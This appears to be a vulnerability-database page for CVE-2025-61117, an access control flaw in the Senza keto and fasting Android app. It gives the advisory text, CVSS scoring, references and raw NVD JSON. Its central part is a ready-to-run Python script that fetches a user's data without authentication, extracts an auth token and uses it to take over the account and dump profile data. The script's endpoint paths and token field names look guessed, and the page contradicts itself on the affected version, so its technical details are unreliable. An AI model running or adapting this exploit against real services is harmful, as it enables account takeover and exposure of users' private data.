CVE-2025-61117

Description

Senza: Keto & Fasting Android App version 2.10.15 (package name com.gl.senza), developed by Paul Itoi, contains an improper access control vulnerability. By exploiting insufficient checks in user data API endpoints, attackers can obtain authentication tokens and perform account takeover. Successful exploitation could result in unauthorized account access, privacy breaches, and misuse of the platform.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Senza: Keto & Fasting App < 2.10.15 (包名: com.gl.senza)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-61117 PoC - Senza Keto & Fasting App API Authentication Bypass
# This PoC demonstrates the improper access control vulnerability in the Senza app

import requests
import json
import sys

def exploit_senza_api(target_url, user_id):
    """
    Exploit improper access control to obtain authentication tokens
    and perform account takeover.
    
    Args:
        target_url: Base URL of the Senza API endpoint
        user_id: Target user ID to extract token for
    """
    headers = {
        'User-Agent': 'Senza/2.10.15 (Android)',
        'Content-Type': 'application/json',
        'Accept': 'application/json'
    }
    
    # Step 1: Attempt to access user data without authentication
    # The API endpoint lacks proper authorization checks
    endpoint = f"{target_url}/api/v1/users/{user_id}/data"
    
    print(f"[*] Targeting endpoint: {endpoint}")
    print(f"[*] Attempting to retrieve user data without authentication...")
    
    try:
        response = requests.get(endpoint, headers=headers, timeout=10)
        
        if response.status_code == 200:
            data = response.json()
            print(f"[+] Success! Retrieved user data for user ID: {user_id}")
            
            # Step 2: Extract authentication token from response
            if 'auth_token' in data or 'token' in data:
                auth_token = data.get('auth_token') or data.get('token')
                print(f"[+] Extracted authentication token: {auth_token}")
                
                # Step 3: Use token for account takeover
                takeover_headers = headers.copy()
                takeover_headers['Authorization'] = f'Bearer {auth_token}'
                
                # Access sensitive endpoints with stolen token
                profile_endpoint = f"{target_url}/api/v1/profile"
                profile_response = requests.get(profile_endpoint, headers=takeover_headers)
                
                if profile_response.status_code == 200:
                    print(f"[+] Account takeover successful!")
                    print(f"[+] Full profile data: {json.dumps(profile_response.json(), indent=2)}")
                
                return auth_token
            else:
                print(f"[+] User data retrieved but no token found: {json.dumps(data, indent=2)}")
                return None
        elif response.status_code == 401:
            print(f"[-] Authentication required - vulnerability may be patched")
            return None
        elif response.status_code == 403:
            print(f"[-] Access forbidden - proper authorization checks in place")
            return None
        else:
            print(f"[-] Unexpected response: {response.status_code}")
            return None
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

def main():
    if len(sys.argv) < 3:
        print("Usage: python senza_exploit.py <api_base_url> <target_user_id>")
        print("Example: python senza_exploit.py https://api.senza-app.com 12345")
        sys.exit(1)
    
    base_url = sys.argv[1]
    user_id = sys.argv[2]
    
    print("=" * 60)
    print("CVE-2025-61117 PoC - Senza Keto & Fasting App")
    print("Improper Access Control leading to Account Takeover")
    print("=" * 60)
    
    exploit_senza_api(base_url, user_id)

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61117
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61117
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61117/
[4] VulDB https://vuldb.com/cve/CVE-2025-61117
[5] https://kar1oz.notion.site/Senza-Keto-Fasting-2629a473ecb28079bce0dab884d912a2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61117", "sourceIdentifier": "[email protected]", "published": "2025-10-30T16:15:36.397", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Senza: Keto & Fasting Android App version 2.10.15 (package name com.gl.senza), developed by Paul Itoi, contains an improper access control vulnerability. By exploiting insufficient checks in user data API endpoints, attackers can obtain authentication tokens and perform account takeover. Successful exploitation could result in unauthorized account access, privacy breaches, and misuse of the platform."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://kar1oz.notion.site/Senza-Keto-Fasting-2629a473ecb28079bce0dab884d912a2", "source": "[email protected]"}]}}